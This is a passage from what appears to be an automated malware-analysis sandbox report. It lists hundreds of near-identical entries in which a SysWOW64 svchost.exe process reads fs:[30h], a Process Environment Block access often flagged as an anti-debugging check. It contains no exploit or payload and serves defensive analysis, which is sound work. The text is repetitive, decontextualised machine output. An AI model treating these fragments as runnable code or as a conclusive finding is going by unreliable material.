                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
